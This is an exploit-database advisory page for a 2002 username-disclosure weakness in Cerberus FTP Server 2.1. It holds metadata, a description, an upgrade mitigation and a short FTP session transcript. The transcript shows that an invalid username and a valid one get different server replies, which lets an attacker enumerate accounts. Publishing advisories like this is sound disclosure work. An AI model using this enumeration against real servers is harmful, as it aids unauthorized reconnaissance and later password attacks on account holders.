header-logo
Suggest Exploit
vendor:
Cerberus FTP Server
by:
SecurityFocus
3.3
CVSS
MEDIUM
Information Disclosure
200
CWE
Product Name: Cerberus FTP Server
Affected Version From: 2.1
Affected Version To: 2.1
Patch Exists: YES
Related CWE: N/A
CPE: //a:cerberusftpserver
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

Cerberus FTP Server Information Disclosure Vulnerability

It has been reported that Cerberus FTP Server is prone to an information disclosure weakness. The problem exists in the way the FTP server handles the authentication procedure. An attacker may exploit a weakness in error handling to disclose valid usernames.

Mitigation:

Upgrade to the latest version of Cerberus FTP Server
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/7369/info

It has been reported that Cerberus FTP Server is prone to an information disclosure weakness.

The problem exists in the way the FTP server handles the authentication procedure. An attacker may exploit a weakness in error handling to disclose valid usernames.

It should be noted that although this weakness was reported to affect Cerberus FTP server version 2.1, previous versions might also be affected.

c:\ ftp www.example.com
User (X.X.X.X:(none)): Not_Valid_User
530 Unknown user
***
Login failed.
Valid User ( The Username Is Hack )
----------
c:\ ftp www.example.com
User (X.X.X.X:(none)): Hack
331 User Hack Ok, password please
***
Password: